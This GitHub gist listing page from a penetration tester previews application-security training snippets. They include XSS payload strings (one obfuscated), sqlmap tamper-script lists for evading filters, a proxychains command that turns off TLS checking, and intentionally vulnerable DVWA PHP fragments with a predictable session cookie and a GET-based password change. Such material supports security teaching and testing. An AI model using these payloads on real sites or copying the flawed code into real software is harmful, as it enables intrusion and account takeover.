(Preferably) Use a VPN
- AlgoVPN https://github.com/trailofbits/algo
- OpenVPN (AS) https://openvpn.net/index.php/access-server/overview.html
- 3rd party service, e.g. ProtonVPN https://protonvpn.com
Install a proxy tool of choise
Vlad Styran sapran
sapran
/ Simple XSS payloads
Last active
April 10, 2024 17:51
— forked from funkaoshi/XSS Strings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " onfocus="alert(1)" name="bounty | |
| (Append #bounty to the URL and enjoy your zero interaction XSS ) | |
| <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
| # Internet Explorer, Edge | |
| <svg><script>alert(1)<p> | |
| # Firefox |
sapran
/ mobileapppentestingworksho.md
Last active
December 25, 2023 10:00
Links and snippets for mobile app pentesting workshop
sapran
/ sqlmap tamper scripts
Last active
December 17, 2023 02:52
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
sapran
/ iptables_vpn
Created
October 29, 2018 15:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ip rule add from $(ip route get 1 | grep -Po '(?<=src )(\S+)') table 128 | |
| ip route add table 128 to $(ip route get 1 | grep -Po '(?<=src )(\S+)')/32 dev $(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)') | |
| ip route add table 128 default via $(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)') |
sapran
/ keybase.md
Created
January 24, 2021 10:17
I hereby claim:
- I am sapran on github.
- I am sapran (https://keybase.io/sapran) on keybase.
- I have a public key ASCg87kjeGdgg5LRWhJaXNpVDoskuE-d1KyB2dmQkfS5EQo
To claim this, I am signing this object:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NODE_TLS_REJECT_UNAUTHORIZED=0 proxychains4 -f ~/proxychains.conf /Applications/Grammarly.app/Contents/MacOS/Grammarly |
sapran
/ resolvers.txt
Last active
October 16, 2018 17:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1.2.4.8 | |
| 103.22.248.62 | |
| 106.186.17.181 | |
| 109.69.8.34 | |
| 109.69.8.51 | |
| 111.223.252.161 | |
| 114.114.114.114 | |
| 114.114.114.119 | |
| 114.114.115.115 | |
| 114.114.115.119 |
sapran
/ sample3.php
Last active
April 6, 2018 07:35
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $html = ""; | |
| if ($_SERVER['REQUEST_METHOD'] == "POST") { | |
| if (!isset ($_SESSION['last_session_id'])) { | |
| $_SESSION['last_session_id'] = 0; | |
| } | |
| $_SESSION['last_session_id']++; | |
| $cookie_value = $_SESSION['last_session_id']; |
sapran
/ sample2.php
Last active
April 6, 2018 07:35
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if( isset( $_GET[ 'Change' ] ) ) { | |
| // Get input | |
| $pass_new = $_GET[ 'password_new' ]; | |
| $pass_conf = $_GET[ 'password_conf' ]; | |
| // Do the passwords match? | |
| if( $pass_new == $pass_conf ) { | |
| // They do! |
sapran
/ appsec_awareness_training_day3.md
Last active
March 29, 2018 06:43
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
OWASP DVWA
- https://github.com/ethicalhack3r/DVWA
- Docker: dvwa:latest
Metasploitable3 + Metasploit Framework
NewerOlder